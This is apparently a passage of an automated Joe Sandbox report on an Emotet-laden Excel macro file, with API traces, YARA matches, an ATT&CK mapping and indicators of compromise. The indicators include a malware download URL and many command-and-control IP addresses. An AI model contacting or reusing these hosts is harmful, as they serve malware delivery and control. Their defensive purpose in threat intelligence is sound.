Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_1006937A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	4_2_1006745A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_10069465
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_100694CA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	4_2_10069506
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	4_2_10019571
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	4_2_100676DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,	4_2_10069730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,	4_2_10059766
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __crtGetLocaleInfoW_stat,	4_2_1006986B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	4_2_100698A6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	4_2_100679A2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __crtGetLocaleInfoA_stat,	4_2_100699E3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	4_2_10071CA2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	4_2_10069CCE

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10063CA7 cpuid

4_2_10063CA7

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_00273210 GetSystemTimeAsFileTime,

8_2_00273210

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_10048B58

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 15.2.regsvr32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.c60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.cc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.4a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.regsvr32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.regsvr32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.620000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.regsvr32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.regsvr32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.770000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.982437930.0000000000770000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.776100426.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.762582363.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.727092920.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.755941529.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.776041513.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.787004594.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.786980121.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.708112308.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.982478205.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.740360397.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.721082289.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.749819742.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.769378943.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.707785239.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.715213011.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.756084497.00000000002E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.769479040.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.733570022.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000B79D __EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,		4_2_1000B79D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000A5B9 CreateBindCtx,CoTaskMemFree,		4_2_1000A5B9

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Scripting	Path Interception	111 Process Injection	131 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	12 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	43 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Modify Registry	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	123 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	21 Scripting	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	37 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	2 Obfuscated Files or Information	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DETAILS-0203.xlsm	51%	ReversingLabs	Document-Word.Trojan.Emotet

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.regsvr32.exe.340000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.regsvr32.exe.2a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.regsvr32.exe.8d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.regsvr32.exe.270000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.regsvr32.exe.320000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.regsvr32.exe.1f0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
7.2.regsvr32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.regsvr32.exe.2b0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
16.2.regsvr32.exe.c30000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
11.2.regsvr32.exe.4a0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.regsvr32.exe.3d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.regsvr32.exe.770000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.regsvr32.exe.cc0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.regsvr32.exe.c60000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.regsvr32.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.regsvr32.exe.210000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.regsvr32.exe.200000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.regsvr32.exe.250000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.regsvr32.exe.370000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.regsvr32.exe.470000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.regsvr32.exe.1b0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.regsvr32.exe.240000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.regsvr32.exe.2b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.regsvr32.exe.620000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
13.2.regsvr32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.regsvr32.exe.2e0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://168.119.39.118/	0%	Avira URL Cloud	safe
https://168.119.39.118/VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy1BC35	0%	Avira URL Cloud	safe
https://168.119.39.118/VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://gymsportive.com/0zwe/pSiUh/	100%	Avira URL Cloud	malware
http://ocsp.entrust.net03	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gymsportive.com	212.64.200.154	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://168.119.39.118/VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy	true	Avira URL Cloud: safe	unknown
http://gymsportive.com/0zwe/pSiUh/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://168.119.39.118/	regsvr32.exe, 00000011.00000002.982352309.000000000029A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://168.119.39.118/VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy1BC35	regsvr32.exe, 00000011.00000002.982352309.000000000029A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 00000011.00000002.982384069.00000000002CD000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
194.9.172.107	unknown	unknown	207992	FEELBFR	true
198.199.98.78	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
54.37.106.167	unknown	France	16276	OVHFR	true
59.148.253.194	unknown	Hong Kong	9269	HKBN-AS-APHongKongBroadbandNetworkLtdHK	true
103.41.204.169	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
61.7.231.226	unknown	Thailand	9931	CAT-APTheCommunicationAuthoityofThailandCATTH	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
93.104.209.107	unknown	Germany	8767	MNET-ASGermanyDE	true
61.7.231.229	unknown	Thailand	9931	CAT-APTheCommunicationAuthoityofThailandCATTH	true
168.119.39.118	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
185.184.25.78	unknown	Turkey	209711	MUVHOSTTR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
139.196.72.155	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
217.182.143.207	unknown	France	16276	OVHFR	true
203.153.216.46	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.71.195.104	unknown	Brazil	267642	TTELESLEITETELECOMUNICACOESLTDAMEBR	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
68.183.93.250	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
87.106.97.83	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.168.130.138	unknown	Ukraine	49720	GIGACLOUD-ASUA	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
118.98.72.86	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
212.64.200.154	gymsportive.com	Turkey	12599	ATLAS-ASTR	false
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	581705
Start date:	02.03.2022
Start time:	16:15:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DETAILS-0203.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@28/5@1/41
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.9% (good quality ratio 96%) Quality average: 80.7% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 90 Number of non-executed functions: 227
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:18:35	API Interceptor	219x Sleep call for process: svchost.exe modified
16:18:36	API Interceptor	887x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	NAgJT2i9xF.dll	Get hash	malicious	Browse
	NAgJT2i9xF.dll	Get hash	malicious	Browse
	Message-0203.xlsm	Get hash	malicious	Browse
	report_82218.xlsm	Get hash	malicious	Browse
	WWKF_532365.xlsm	Get hash	malicious	Browse
	LJWji3qxz9S2bhAgmf.dll	Get hash	malicious	Browse
	774-0203.xlsm	Get hash	malicious	Browse
	ydy_07285362.xlsm	Get hash	malicious	Browse
	Ruj7S46liw.dll	Get hash	malicious	Browse
	jzi6GWIsyf.dll	Get hash	malicious	Browse
	7D1C4ILkQI.dll	Get hash	malicious	Browse
	45pz68iNQb.dll	Get hash	malicious	Browse
	UQaf43fCX0.dll	Get hash	malicious	Browse
	LNhXpzcQAu.dll	Get hash	malicious	Browse
	9sZYpQ0vDv.dll	Get hash	malicious	Browse
	9sZYpQ0vDv.dll	Get hash	malicious	Browse
	0uzLmuwxoS.dll	Get hash	malicious	Browse
	QbFmj8SIim.dll	Get hash	malicious	Browse
	h80jibF7cc.dll	Get hash	malicious	Browse
	J3jXFhySLZ.dll	Get hash	malicious	Browse
104.131.62.48	NAgJT2i9xF.dll	Get hash	malicious	Browse
	NAgJT2i9xF.dll	Get hash	malicious	Browse
	Message-0203.xlsm	Get hash	malicious	Browse
	report_82218.xlsm	Get hash	malicious	Browse
	WWKF_532365.xlsm	Get hash	malicious	Browse
	LJWji3qxz9S2bhAgmf.dll	Get hash	malicious	Browse
	774-0203.xlsm	Get hash	malicious	Browse
	ydy_07285362.xlsm	Get hash	malicious	Browse
	Ruj7S46liw.dll	Get hash	malicious	Browse
	jzi6GWIsyf.dll	Get hash	malicious	Browse
	7D1C4ILkQI.dll	Get hash	malicious	Browse
	45pz68iNQb.dll	Get hash	malicious	Browse
	UQaf43fCX0.dll	Get hash	malicious	Browse
	LNhXpzcQAu.dll	Get hash	malicious	Browse
	9sZYpQ0vDv.dll	Get hash	malicious	Browse
	9sZYpQ0vDv.dll	Get hash	malicious	Browse
	0uzLmuwxoS.dll	Get hash	malicious	Browse
	QbFmj8SIim.dll	Get hash	malicious	Browse
	h80jibF7cc.dll	Get hash	malicious	Browse
	J3jXFhySLZ.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gymsportive.com	Message-0203.xlsm	Get hash	malicious	Browse	212.64.200.154

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	NAgJT2i9xF.dll	Get hash	malicious	Browse	66.42.57.149
	NAgJT2i9xF.dll	Get hash	malicious	Browse	66.42.57.149
	Message-0203.xlsm	Get hash	malicious	Browse	66.42.57.149
	report_82218.xlsm	Get hash	malicious	Browse	66.42.57.149
	WWKF_532365.xlsm	Get hash	malicious	Browse	66.42.57.149
	LJWji3qxz9S2bhAgmf.dll	Get hash	malicious	Browse	66.42.57.149
	774-0203.xlsm	Get hash	malicious	Browse	66.42.57.149
	ydy_07285362.xlsm	Get hash	malicious	Browse	66.42.57.149
	Ruj7S46liw.dll	Get hash	malicious	Browse	66.42.57.149
	jzi6GWIsyf.dll	Get hash	malicious	Browse	66.42.57.149
	7D1C4ILkQI.dll	Get hash	malicious	Browse	66.42.57.149
	45pz68iNQb.dll	Get hash	malicious	Browse	66.42.57.149
	UQaf43fCX0.dll	Get hash	malicious	Browse	66.42.57.149
	LNhXpzcQAu.dll	Get hash	malicious	Browse	66.42.57.149
	9sZYpQ0vDv.dll	Get hash	malicious	Browse	66.42.57.149
	9sZYpQ0vDv.dll	Get hash	malicious	Browse	66.42.57.149
	0uzLmuwxoS.dll	Get hash	malicious	Browse	66.42.57.149
	QbFmj8SIim.dll	Get hash	malicious	Browse	66.42.57.149
	h80jibF7cc.dll	Get hash	malicious	Browse	66.42.57.149
	J3jXFhySLZ.dll	Get hash	malicious	Browse	66.42.57.149
DIGITALOCEAN-ASNUS	NAgJT2i9xF.dll	Get hash	malicious	Browse	128.199.192.135
	NAgJT2i9xF.dll	Get hash	malicious	Browse	128.199.192.135
	Message-0203.xlsm	Get hash	malicious	Browse	128.199.192.135
	report_82218.xlsm	Get hash	malicious	Browse	128.199.192.135
	Form.xlsm	Get hash	malicious	Browse	178.128.83.165
	innovinc.org.xlsm	Get hash	malicious	Browse	178.128.83.165
	RechnungScan_02_03_2022.xlsm	Get hash	malicious	Browse	178.128.83.165
	WWKF_532365.xlsm	Get hash	malicious	Browse	128.199.192.135
	FFFbuild-12022-03-0211-20.exe	Get hash	malicious	Browse	164.90.194.235
	LJWji3qxz9S2bhAgmf.dll	Get hash	malicious	Browse	128.199.192.135
	774-0203.xlsm	Get hash	malicious	Browse	128.199.192.135
	ydy_07285362.xlsm	Get hash	malicious	Browse	128.199.192.135
	2022-03-02_1703.xlsm	Get hash	malicious	Browse	178.128.83.165
	2022-03-02_1706.xlsm	Get hash	malicious	Browse	178.128.83.165
	Ruj7S46liw.dll	Get hash	malicious	Browse	128.199.192.135
	jzi6GWIsyf.dll	Get hash	malicious	Browse	128.199.192.135
